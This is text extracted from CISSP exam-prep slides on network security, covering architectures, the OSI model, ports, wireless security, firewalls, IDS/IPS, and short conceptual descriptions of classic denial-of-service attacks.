CISSP EXAM CRAM

THE COMPLETE COURSE

Communication and
Network Security
D O M A I N 4 : COMMUNICATION & NETWORK SECURITY

4.1 Implement secure design principles in network

architectures
4.2 Secure network components
4.3 Implement secure communication channels
according to design
what’s new in domain 4?
4.1 Assess and implement secure design principles in
network architectures
Micro-segmentation Wireless Networks
– Software Defined Networks (SDN) – Li-fi
– Virtual eXtensible Local Area – Zigbee
Network (VXLAN)
– Satellite
– Encapsulation
– Software-Defined Wide Area Cellular Networks
Network (SD-WAN) – 4G, 5G

- Content Distribution Networks (CDN)

For more cybersecurity exam prep tutorials, follow us on Youtube at Inside Cloud and Security
network architectures
network virtualization enabling network
segmentation at high scale.

overcomes VLAN scale limitations – limit is

Virtual 4096 VLANs versus millions of VXLANs
Extensible
LAN tunneling protocol that encapsulates an
Ethernet frame (layer 2) in a UDP packet.

explained in rfc7348, the VXLAN RFC

layer 2 can generally only be attacked from within (e.g. MAC

spoofing, or flooding to cause DoS), such as by a rogue host.
network architectures
a network architecture approach that enables
the network to be intelligently and centrally
controlled, or ‘programmed,’ using software

and has capacity to reprogram the data plane at

Software any time.
Defined
use cases include SD-LAN and SD-WAN
Networks
Separating the control plane from the data plane
opens up a number of security challenges

SDN vulnerabilities can include man-in-the-middle attack

(MITM) and a service denial (DoS) secure with TLS !
network architectures
enables users in branch offices to remotely
connect to an enterprise's network

enables use of many network services –MPLS,

LTE, and broadband internet, etc. – to securely
Software Defined
connect users to applications..
Wide-Area
Networks security is based largely on IP security (IPsec),
VPN tunnels, next-gen firewalls (NGFWs), and
the micro-segmentation of application traffic

uses a centralized control function for intelligent routing and

secure access service edge (SASE) to decentralize connectivity
network architectures

uses the modulation of light intensity to

transmit data (uses LED).
can safely function in areas otherwise
Light Fidelity
susceptible to electromagnetic interference
can theoretically transmit at speeds of up to
100 Gbit/s

LI-FI only requires working LED lights

visible light is that it cannot penetrate opaque walls.

network architectures

uses the modulation of light intensity to

transmit data (uses LED).
can safely function in areas otherwise
Light Fidelity
susceptible to electromagnetic interference
can theoretically transmit at speeds of up to
100 Gbit/s

LI-FI only requires working LED lights

visible light is that it cannot penetrate opaque walls.

network architectures
A short-range wireless PAN (Personal Area Network)
technology developed to support automation,
machine-to-machine communication, remote
control and monitoring of IoT devices.
Personal Area supports both centralized and distributed
Network (PAN) security models, and mesh topology
IoT smart assumes that symmetric keys used are
home hub transmitted securely (encrypted in-transit)

During pre-configuration of a new device, in which a single

key might be sent unprotected, creating a brief vulnerability.
CELLULAR NETWORKING

Faster speeds and lower latency

Unlike 4G, 5G doesn’t identify each user through

their SIM card. Can assign identities to each device.

Some air interface threats, such as session

5th Generation
hijacking, are dealt with in 5G.
Cellular
Standalone (SA) version of 5G will be more secure
than the non-standalone (NSA) version

NSA anchors the control signaling of 5G networks to the 4G Core

CELLULAR NETWORKING

Diameter protocol, which provides authentication,

authorization, and accounting (AAA), will be a
target.

Because 5G has to work alongside older tech

5th Generation (3G/4G), old vulnerabilities may be targeted.
Cellular Because scale of IoT endpoint counts on 5G is
exponentially greater, DDoS is a concern.

Some carriers originally launched an NSA version of 5G,

which continues to rely on availability of the 4G core.
content delivery networks (cdn)
a geographically distributed network of proxy servers
and their data centers.
goal is fast and highly available content delivery by
distributing content spatially relative (close to) users.
CDN networks serving JavaScript have been targeted
to inject malicious content into pages.
examples: video and audio streaming, software downloads, etc.

Vendors in CDN space offer DDoS protection

and web application firewalls (WAF)
THE OSI MODEL
Away 7 Application All

Pizza 6 Presentation People

Sausage 5 Session Seem

Throw 4 Transport To
|
Not 3 Network Need

Do 2 Data Link Data

Please 1 Physical Processing

THE OSI MODEL
7 Application SSH, HTTP, FTP, LPD, SMTP, Telnet, TFTP, EDI,
POP3, IMAP, SNMP, NNTP, S-RPC, and SET

6 Presentation Encryption protocols and format types, such

as ASCII, EBCDICM, TIFF, JPEG, MPEG, MIDI

5 Session SMB, RPC, NFS, and SQL

4 Transport SPX, SSL, TLS, TCP, and UDP

| ICMP,
3 Network RIP, OSPF, BGP, IGMP, IP, IPSec,
IPX, NAT, and SKIP

2 Data Link ARP, SLIP, PPP, L2F, L2TP, PPTP, FDDI, ISDN

1 Physical EIA/TIA-232, EIA/TIA-449, X.21, HSSI, SONET,

V.24, V.35, Bluetooth, 802.11 – Wifi, and Ethernet
common TCP/UDP ports
P r o t ocol T CP / UDP P o r t Numb er Protocol TCP/UDP Port Number

PROTOCOL TCP/UDP Port PROTOCOL TCP/UDP Port

File Transfer Protocol (FTP) TCP 20/21 NetBIOS TCP/UDP 137/138/139
Secure Shell (SSH) TCP 22 Internet Message Access TCP 143
Protocol (IMAP)
Telnet TCP 23
Simple Mail Transfer Protocol TCP 25 Simple Network Mgmt TCP/UDP 161/162
(SMTP) Protocol (SNMP)

Domain Name System (DNS) TCP/UDP 53 Border Gateway Protocol TCP 179
(BGP)
Dynamic Host Configuration UDP 67/68
Protocol (DHCP) Lightweight Directory Access TCP/UDP 389
Protocol (LDAP)
Trivial File Transfer Protocol UDP 69
(TFTP) HTTP over SSL/TLS (HTTPS) TCP 443
Hypertext Transfer Protocol TCP 80
LDAP over TLS/SSL TCP/UDP 636
(HTTP)
FTP over TLS/SSL TCP 989/990
Post Office Protocol (POP3) TCP 110
Network Time Protocol (NTP) UDP 123
TCP vs OSI

Link
TCP vs udp
No. TCP UDP

1 Connection oriented Connection-less protocol

2 Byte stream Message stream

No support for Supports
3
multicasting/broadcasting multicasting/broadcasting
Supports full duplex No support for full duplex
4
transmission transmission
Reliable service of data Unreliable service of data
5
transmission transmission
TCP packet is called a UDP packet is called a
6
segment datagram
Provides error detection and No support for error detection
7
flow control and flow control
cabling types & throughput
cabling types & throughput

UTP = unshielded twisted pair

standard network topologies

MESH BUS

RING STAR
standard network topologies

Employs a centralized connection

device.
Can be a simple hub or switch.
Each system is connected to the
STAR central hub by a dedicated segment
standard network topologies
Connects systems to all other systems using
numerous paths.
A partial mesh topology connects many
systems to many other systems.
Provides redundant connections to
MESH systems, allowing multiple segment failures
without seriously affecting connectivity.
standard network topologies
Connects each system as points on a
circle.
The connection medium acts as a
unidirectional transmission loop.
Only one system can transmit data at a
time. Traffic management is performed
RING
by a token.

Token ring is a ring-based network

standard network topologies
Connects each system to a trunk or
backbone cable.
All systems on the bus can transmit
data simultaneously, which can result in
collisions.

BUS A collision occurs when two systems

transmit data at the same time; the
signals interfere with each other.

Ethernet is a bus network

analog vs digital
Analog
Communications occur with a continuous signal that varies in frequency,
amplitude, phase, voltage, and so on.
The variances in the continuous signal produce a wave shape (as opposed to the
square shape of a digital signal).
The actual communication becomes altered and corrupted because of
attenuation over long distances and interference.

Digital
Communications occur through the use of a discontinuous electrical signal and a
state change or on-off pulses.
More reliable than analog signals over long distances or when interference is
present because of a digital signal’s definitive information storage method
Uses current voltage where voltage on represents a value of 1 and voltage off
represents a value of 0. These on-off pulses create a stream of binary data.
synchronous vs asynchronous
Some communications are synchronized with some sort of clock
or timing activity, and are synchronous or asynchronous:

Synchronous
Communications rely on a timing or clocking mechanism based on either
an independent clock or a time stamp embedded in the data stream.
Are typically able to support very high rates of data transfer. example: networking

Asynchronous
Communications rely on a stop and start delimiter bit to manage the
transmission of data.
Best suited for smaller amounts of data.

example: public switched telephone network (PSTN) modems

baseband vs broadband
Baseband
can support only a single communication channel.
it uses a direct current applied to the cable. A current that is at a higher level
represents the binary signal of 1, and a lower level is binary signal of 0
is a form of digital signal. example: ethernet

Broadband
can support multiple simultaneous signals. uses frequency modulation to support
numerous channels,
each supporting a distinct communication session. suitable for high throughput
rates, especially when several channels are multiplexed.
is a form of analog signal. TV, cable modem, ISDN, DSL, T1, T3
broadcast, multicast, unicast

Broadcast, multicast, and unicast technologies determine

how many destinations a single transmission can reach:
Broadcast technology supports communications to all
possible recipients.
Multicast technology supports communications to
multiple specific recipients.
Unicast technology supports only a single communication
to a specific recipient.
csma, csma/ca, csma/cd

Developed to decrease the chances of collisions when

two or more stations start sending their signals over
the datalink layer. Requires that each station first
check the state of the medium before sending.
csma, csma/ca, csma/cd

CSMA
does not directly address collisions.

CSMA/CA (collision avoidance)

attempts to avoid collisions by granting only a single permission to
communicate at any given time.

CSMA/CD (collision detection)

responds to collisions by having each member of the collision domain wait
for a short but random period of time before starting the process over.
csma, csma/ca, csma/cd
NO. CSMA/CD detection CSMA/CA avoidance
1 CSMA / CD is effective after a collision. Whereas CSMA / CA is effective before a collision.

Whereas CSMA / CA is commonly used in

2 CSMA / CD is used in wired networks.
wireless networks.

Whereas CSMA/ CA minimizes the possibility of

3 It only reduces the recovery time.
collision.

CSMA / CD resends the data frame Whereas CSMA / CA will first transmit the intent to
4
whenever a conflict occurs. send for data transmission.

5 CSMA / CD is used in 802.3 standard. While CSMA / CA is used in 802.11 standard.

It is more efficient than simple Is similar to simple CSMA (Carrier Sense Multiple
6
CSMA(Carrier Sense Multiple Access). Access) in terms of efficiency.
token passing, polling

Performs communications using a digital

token. Once its transmission is complete, it
releases the token to the next system.
Prevents collisions
in ring networks

Performs communications using a master-

slave configuration. The primary system
polls each secondary system in turn
Used by SDLC whether they have a need to transmit data.
network segmentation
a private network that is designed to host the
same information services found on the Internet.

a section of an organization’s network that has

been sectioned off to act as an intranet for the
private network but also serves information to
a cross between
Internet & intranet
the public Internet.

an extranet for public consumption is typically

labeled a demilitarized zone (DMZ) or
perimeter network.
perimeter

used to control traffic and isolate static/sensitive environments

network segmentation

Boosting Performance
can improve performance through an organizational scheme in which
systems that often communicate are located in the same segment, while
systems that rarely or never communicate are located in other segments.

Reducing Communication Problems

reduces congestion and contains communication problems, such as
broadcast storms, to individual subsections of the network.

Providing Security
can also improve security by isolating traffic and user access to those
segments where they are authorized.
BLUETOOTH
Bluetooth, or IEEE 802.15, personal area
networks (PANs) are another area of
wireless security concern.

Connects headsets for cell phones, mice,

keyboards, GPS, and other devices
(IEEE 802.15)
Connections are set up using pairing, where
primary device scans the 2.4 GHz radio
frequencies for available devices

Pairing uses a 4-digit code (often 0000) to reduce

accidental pairings but is not actually secure.
mobile system attacks
BLUEJACKING (annoyance)
Think of it as a high-tech version of ding-dong-ditch, where savvy pranksters
push unsolicited messages to engage or annoy other nearby Bluetooth users by
taking advantage of a loophole in the technology’s messaging options.

BLUESNARFING (data theft)

With bluesnarfing, thieves wirelessly connect to some early Bluetooth-
enabled mobile devices without the owner’s knowledge to download and/or
alter phonebooks, calendars or worse.

BLUEBUGGING
An attack that grants hackers remote control over the feature and
functions of a Bluetooth device. This could include the ability to turn
on the microphone to use the phone as an audio bug.
wireless technologies (cont)
Version Speed Frequency

* 802.11 2 Mbps 2.4 GHz

802.11a 54 Mbps 5 GHz
802.11b 11 Mbps 2.4 GHz
802.11g 54 Mbps 2.4 GHz
802.11n 200+ Mbps 2.4 GHz
802.11ac 1 Gbps 5 GHz

802.11 standard also defines WEP

SSID BROADCAST

Wireless networks traditionally announce their SSID

on a regular basis with a beacon frame

When the SSID is broadcast, any device with

automatic detect and connect to the network
Broadcast
Hiding the SSID is considered “security through
obscurity” - it’s detectable through client traffic

SSID = service set identifier

TKIP

was designed as the replacement for WEP

without the need to replace legacy hardware
Temporal Key implemented into 802.11 wireless networking
Integrity Protocol under the name WPA (Wi-Fi Protected Access).
CCMP

Counter Mode with Cipher Block Chaining

Message Authentication Code Protocol

created to replace WEP and TKIP/WPA

uses AES (Advanced Encryption Standard)

with a 128-bit key

used with WPA2, which replaced WEP and WPA

wpa2

a new encryption scheme known as the

Counter Mode with Cipher Block Chaining
Message Authentication Code Protocol (CCMP),

CCMP is based on the AES encryption scheme

fibre channel & FCoE
Fibre Channel
a form of network data storage solution (i.e., SAN (storage
area network) or NAS (network-attached storage)) that
allows for high-speed file transfers.

Understand FCoE
FCoE (Fibre Channel over Ethernet) is used to encapsulate
Fibre Channel communications over Ethernet networks.
iSCSI

iSCSI (Internet Small Computer System

Interface) is a networking storage standard
based on IP.
site survey

The process of investigating the presence,

strength, and reach of wireless access
points deployed in an environment.
site survey

usually involves walking around with a

portable wireless device, taking note of the
wireless signal strength, and mapping this on
a plot or schematic of the building.
eap, peap, LEAP
a Cisco proprietary alternative to TKIP for WPA. developed
to address deficiencies in TKIP before the 802.11i/WPA2
Lightweight… system was ratified as a standard.

encapsulates EAP methods within a TLS tunnel that

provides authentication and potentially encryption.
Protected…

an authentication framework. allows for new authentication

technologies to be compatible with existing wireless or
point-to-point connection technologies
extensible
authentication
protocol
MAC FILTERING

a list of authorized wireless client interface

MAC addresses

used by a wireless access point to block

access to all nonauthorized devices.
CAPTIVE PORTALS

portal is an authentication technique that

redirects a newly connected wireless web
client to a portal access control page.
ANTENNA TYPES

Monopole Panel Dipole. Loop

Cantenna Yagi Parabolic

ANTENNA TYPES

Reaches multiple frequencies and is more

commonly used for TV and RFID systems.
Omnidirectional if horizontally mounted.
Loop
ANTENNA TYPES

an omnidirectional antenna that can send and

receive signals in all directions perpendicular
to the line of the antenna itself.
Monopole
ANTENNA TYPES

an omnidirectional antenna essentially

composed of two monopoles. Generate
powerful signal in restricted space
Dipole.
ANTENNA TYPES

flat devices that focus from only one

side of the panel.

Panel
ANTENNA TYPES

are used to focus signals from very long

distances or weak sources.

Parabolic
ANTENNA TYPES

crafted from a straight bar with cross

sections to catch specific radio frequencies in
the direction of the main bar.
Yagi
ANTENNA TYPES

constructed from tubes with one sealed end.

They focus along the direction of the open
end of the tube.
Cantenna
network devices
Firewalls
Firewalls are essential tools in managing and controlling network traffic. A firewall is a
network device used to filter traffic.

Switch
repeats traffic only out of the port on which the destination is known to exist. Switches
offer greater efficiency for traffic delivery, create separate collision domains, and
improve the overall throughput of data. usually layer 2, sometimes layer 3

Routers
used to control traffic flow on networks and are often used to connect similar
networks and control traffic flow between the two. They can function using statically
defined routing tables, or they can employ a dynamic routing system. layer 3

Gateways
a gateway connects networks that are using different network protocols. also known
as protocol translators, can be stand-alone hardware devices or a software service.
network gateways work at layer 3.
network devices
Repeaters, Concentrators, and Amplifiers
used to strengthen the communication signal over a cable segment as well as
connect network segments that use the same protocol. layer 1

Bridges
used to connect two networks (even networks of different topologies, cabling types,
and speeds) in order to connect network segments that use the same protocol. layer 2

Hubs
Hubs were used to connect multiple systems and connect network segments that use
the same protocol. A hub is a multiport repeater. Hubs operate at OSI layer 1. layer 1

LAN Extenders
a remote access, multilayer switch used to connect distant networks over WAN links.
lan & wan technologies
WAN connections and communication links can include private
circuit technologies and packet-switching technologies.

Private circuit technologies use dedicated physical circuits.

Private circuit technologies

— dedicated or leased lines
— PPP (point-to-point protocol
— SLIP (serial line internet protocol)
— ISDN (integrated services digital network)
— DSL (digital subscriber line)
lan & wan technologies
WAN connections and communication links can include private
circuit technologies and packet-switching technologies.

Packet-switching technologies use virtual circuits instead of

dedicated physical circuits. efficient and cost effective

Packet switching technologies

— X.25, Frame Relay
— Asynchronous transfer mode (ATM),
— Synchronous Data Link Control (SDLC)
— High-Level Data Link Control (HDLC)
firewalls

Static Packet-Filtering Firewalls Operate at layer 3 and up

filters traffic by examining data from a message header.

Application-Level Firewalls Operate at layer 7 of OSI model

filters traffic based on a single internet service, protocol, or application

Circuit-Level Firewalls
used to establish communication sessions between trusted partners.
They operate at the Session layer (layer 5) of the OSI model.

SOCKS is an example of a circuit-level firewall

firewalls

Stateful Inspection Firewalls

evaluate the state, session, or the context of network traffic.
Deep Packet Inspection Firewalls
a filtering mechanism that operates typically at the
application layer in order to filter the payload contents of a
communication rather than only on the header values.
Firewall and state
Watch network traffic and restrict or block packets based
on source and destination addresses or other static values.
Not 'aware' of traffic patterns or data flows.
Typically, faster and perform better under heavier traffic
loads.

Can watch traffic streams from end to end.

Are aware of communication paths and can implement
various IP security functions such as tunnels and encryption.
Better at identifying unauthorized and forged
communications.
modern firewalls
protect web applications by filtering and
monitoring HTTP traffic between a web
application and the Internet.
Web Application typically protects web applications from common
aka “WAF” attacks like XSS, CSRF, and SQL injection.
Some come pre-configured with OWASP rulesets

a deep-packet inspection firewall that moves

beyond port/protocol inspection and blocking.
adds application-level inspection, intrusion
Next Generation prevention, and brings intelligence from
aka “NGFW” outside the firewall.
types of firewalls
packet inspection inspects and filters both
the header and payload of a packet that is
transmitted through an inspection point.

can detect protocol non-compliance, spam, viruses, intrusions

a multifunction device (MFD) composed of

several security features in addition to a firewall;
may include IDS, IPS, a TLS/SSL proxy, web
filtering, QoS management, bandwidth throttling,
aka “UTM” NAT, VPN anchoring, and antivirus.

More common in small and medium businesses (SMB)

Types of firewalls
allows private subnets to communicate with
other cloud services and the Internet but hides
the internal network from Internet users.
Network Address
The NAT gateway has the Network Access
Translation Gateway
Control List (NACL) for the private subnets. .

Looks at the content on the requested web

page and blocks request depending on filters.
Used to block inappropriate content in the
context of the situation.
Associated with “deep packet inspection”
Open-source vs proprietary firewalls

one in which the vendor makes the license freely available and allows
access to the source code, though it might ask for an optional donation.
There is no vendor support with open source, so you might pay a third
party to support in a production environment
One of the more popular open-source firewalls is pfsense, the
details for which can be found at https://www.pfsense.org/.

are more expensive but tend to provide more/better protection and

more functionality and support (at a cost).
many vendors in this space, including Cisco, Checkpoint, Pal Alto,
Barracuda. but “no source code access”
hardware vs software

A piece of purpose-built network hardware.

May offer more configurable support for LAN and WAN connections.
Often has superior throughput versus software because it is hardware
designed for the speeds and connections common to an enterprise network.

Software based firewalls that you might install on your own hardware.
Provide flexibility to place firewalls anywhere you’d like in your organization.
On servers and workstations, you can run a host-based firewall.

Host-based (software) are more vulnerable

in some aspects due to attack vectors
application vs host-based vs virtual
Typically catered specifically to application communications.
Often that is HTTP or Web traffic.
An example is called a next generation firewall (NGFW)

An application installed on a host OS, such as Windows

or Linux, both client and server operating systems.

In the cloud, firewalls are implemented as virtual

network appliances (VNA).
Available from both the CSP directly and third-party
partners (commercial firewall vendors)
IDS and IPS

analyzes whole packets, both header and

payload, looking for known events. When a
known event is detected, a log message is
generated.
Reports and/or alerts

analyzes whole packets, both header and

payload, looking for known events. When a
known event is detected, packet is rejected.

Takes action !
types of ids systems
creates a baseline of activity to identify
normal behavior and then measures system
performance against the baseline to detect
abnormal behavior.
can detect previously unknown attack methods

uses signatures similar to the signature

definitions used by anti-malware software.
only effective against known attack methods

Both host-based (HIDS) and network-based (NIDS) systems can

be knowledge based, behavior based, or a combination of both.
Host-based IDS and IPS
IDS/IPS in software form, installed on a host (often a server)

analyzes whole packets, both header and

payload, looking for known events. When a
Host-based Intrusion known event is detected, a log message is
Detection System generated.

analyzes whole packets, both header and

payload, looking for known events. When a
Host-based Intrusion known event is detected, packet is rejected.
Prevention System
Network-based IDS and IPS
IDS/IPS at the network level, often in hardware form

analyzes whole packets, both header and

payload, looking for known events. When a
Network-based Intrusion known event is detected, a log message is
Detection System generated.

analyzes whole packets, both header and

payload, looking for known events. When a
Network-based Intrusion known event is detected, packet is rejected.
Prevention System
Modes of Operation

NIDS/NIPS placed on or near the firewall

aka “in-band” as an additional layer of security.

traffic does not go through the

NIPS/NIDS.
aka “out-of-band” sensors and collectors forward
alerts to the NIDS.
Network appliances

can be placed on a network to alert NIDS of

any changes in traffic patterns on the network.
If you place a sensor on the Internet side of the
network, it can scan all of the traffic from the
Internet.
Secure Network Design
computer or appliance that is exposed on the Internet and
has been hardened by removing all unnecessary elements,
such as services, programs, protocols, and ports.
hardened

is a firewall-protected system logically positioned just

inside a private network.
MOST SECURE

similar to the screened host in concept, except a subnet is

placed between two routers or firewalls and the bastion
host(s) is located within that subnet.

A proxy server functions on behalf of the client requesting

service, masking the true origin of the request to the resource.
Secure Network Design

Lure bad people into doing bad things. Lets

you watch them.

Only ENTICE, not ENTRAP. you are not allowed

to let them download items with “Enticement”.

For example, allowing download of a fake

payroll file would be entrapment.

remember this difference!

Goal is to distract from real assets and isolate in a padded cell

until you can track them down.
network attacks
Teardrop Attack
is a denial-of-service (DoS) attack that involves sending fragmented packets
to a target machine. Since the machine receiving such packets cannot
reassemble them due to a bug in TCP/IP fragmentation reassembly, the
packets overlap one another, crashing the target network device.

Fraggle Attack
is a denial-of-service (DoS) attack that involves sending a large amount of spoofed
UDP traffic to a router's broadcast address within a network. It is very similar to a Smurf
Attack, which uses spoofed ICMP traffic using a 3rd party network rather than UDP
traffic to achieve the same goal.

Land Attack
is a Layer 4 Denial of Service (DoS) attack in which, the attacker sets the source and
destination information of a TCP segment to be the same. A vulnerable machine will
crash or freeze due to the packet being repeatedly processed by the TCP stack
network attacks
SYN FlooD
is a form of denial-of-service attack in which an attacker sends a succession
of SYN requests to a target's system in an attempt to consume enough server
resources to make the system unresponsive to legitimate traffic.

Ping of Death
Employs an oversized ping packet. Max allowed ping packet size is 65,536
bytes. Ping of death sends package 65,537 bytes or larger.

1) SYN 2) SYN-ACK 3) ACK

Know the TCP 3-way handshake, a process used in a TCP/IP

network to make a connection between the server and client.